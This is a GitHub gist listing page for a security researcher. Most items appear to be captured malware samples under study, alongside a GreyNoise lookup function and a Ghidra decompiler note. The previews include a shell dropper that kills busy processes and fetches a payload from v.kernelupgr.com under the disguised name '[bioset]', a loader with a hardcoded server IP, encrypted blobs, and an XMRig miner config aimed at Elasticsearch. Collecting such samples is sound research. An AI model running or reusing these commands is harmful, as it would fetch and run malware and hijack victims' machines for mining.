Skip to content

Instantly share code, notes, and snippets.

Remco Verhoef nl5887

Block or report user

Report or block nl5887

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@nl5887
nl5887 / gist:0a55e297aad9bf5f4882deb44ea0ef79
Created Mar 18, 2019
fish function to query greynoise for specific ip
View gist:0a55e297aad9bf5f4882deb44ea0ef79
function greynoise
if test (count $argv) -eq 0
echo "No arguments specified. Usage:\necho greynoise {ip}"
return 1
end
set ip $argv[1]
curl -s -XPOST -d "ip=$ip" 'http://api.greynoise.io:8888/v1/query/ip'|jq '.'
end
@nl5887
nl5887 / 001_readme.md
Last active Apr 18, 2019
Metasploit Meterpreter handler servers (HTTP/HTTPS)
View 001_readme.md

This gist contains a list of verified Metasploit Meterpreter http(s) handlers and Powershell Empire http(s) listeners.

Servers could be malicious, or just part of a red teaming action.

Thanks to censys.io and Jose.

@nl5887
nl5887 / 00_readme.md
Last active Jun 4, 2019
Ghidra decompile
View 00_readme.md

Ghydra decompiler

This python script communicates with the Ghydra decompiler. Currently it succeeds in communicating, sending hardcoded opcodes and returning decompiled code.

Currently working on reversing the getPcodePacked command.

Next steps:

  • implement exception handling
  • implement callbacks
  • allow decompilation of custom payloads
View all
ps aux |awk '$3>40.0{print $2}'|xargs kill -9
cd /tmp
if [ $? -ne 0 ]
then
export PATH=`pwd`:$PATH
else
export PATH=/tmp:$PATH
fi
wget -q v.kernelupgr.com/d/vv -O \[bioset\] || curl -s v.kernelupgr.com/d/vv -o \[bioset\]
chmod +x \[bioset\]
View a
#!/bin/sh
# Edit
WEBSERVER="209.141.50.26"
# Stop editing now
BINARIES="arm arm7 arm64"
for Binary in $BINARIES; do
View gist:e7b044f7d264dba7d88daed49a3c084e
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2012-2017 Matt Martz
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
View gist:9cb88cf2ef9849d3873b611bce3b0aaa
A1/knnUWULU2NiOgmM//YB9bTMpU+Zg3JfBube+UUTbHcbV0/akpEn/3VnZb7lYTDCxazq0efcDarXzQK6X1Xnk4pAYgqCOhlLjjqhSLWk6Uy+c8Fd0Q69dhMG4neFv2HbTohqdIrv+5iixaKhxP3lMJVW5TAiuRJrHiMA5z4MxgTX89Oz8jM+S5bcQhKVPfk8LrRLFk2Zlp7hj68e2Cqaa/wQC8osJPLm/Y/ejJgjQg4WpHJ+bEEZWIRmr0dhsZLYSWBn1FEMzv43KkrDAmb1gM9G63Llxj8MfZlOcZXcnDgn7e4ytoL56mkcBUOEYmG/5JJ2OQvIkcheq+77rztisgsPxSVdo+KQyVbYrCvFCHb2Eh
A1/kzSIfAKdirHqv4ILCwBmTbiutpRbIQIGZJ38p5ugwNTjDYvnj73yC/sZbhoIXG/x4OwI4SgwijkqkiBELYSBf13gS5Y1pxnswZuhytjkpsBpBUCmsggE27TRtm9BD9V+BuQOIlPigmmJ6G+4dWnc4kCNkdh/4ga7Ym2AzuPDK0TgDkyds4OSkh271uGC0Q6WC0YleKGaF6oi1rMSUhI8NqzBtVTwNafUR49t0LxArB9DQuSzbGVqXBnPZpSKsfkq0Wv+vaDekCouZ6vFQ2YPXr8IxRXoxxGHgJVuANxPPb3jzHcSgo76BX2i4OLNeS1k1lZqmgUc7qz7XgNxlnTAKaSAu4kLjgZkrE8tpFU3LqFRece8D84Sy
A16zzHwSVQTcEZqvZ61pmw0hpca/WzVMF2kP89s5/9I4y2J47hcQidU1h4pzyZdA0F5QtAzrEKkveIpAQEPdX3/74CBVf5qE49Dmy6Od4YQgpEoX2KXGrHUJC+HsVZUr5efGu1H1aLiZH1Y/0mxvzVRuYZDN01jLAXDhTEOfFbAarX86B5ckT/3VdO2gdNvvku/26rHdLC0SbiwyfElwCz9SMePTI+TT5hlnmh2oTwzy5+UwUUBVwJAAU2LkT2OAIOzdPpWVvSLYSKRqP7xaPI
View gist:9f3413ed486b117134c59aa4daee17b8
MD5 (/Users/remco/Downloads/paimon.x86) = 5efce325c5aa2fa11553bf6a4bd94b74
arch x86
baddr 0x8048000
binsz 37184
bintype elf
bits 32
canary false
sanitiz false
class ELF32
@nl5887
nl5887 / config.json
Last active Nov 29, 2018
Targetting Elasticsearch
View config.json
{
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
"av": 0, // algorithm variation, 0 auto select
"background": true, // true to run the miner in the background
"colors": true, // false to disable colored output
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
"cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
"donate-level": 3, // donate level, mininum 1%
"log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
"max-cpu-usage": 65, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
You can’t perform that action at this time.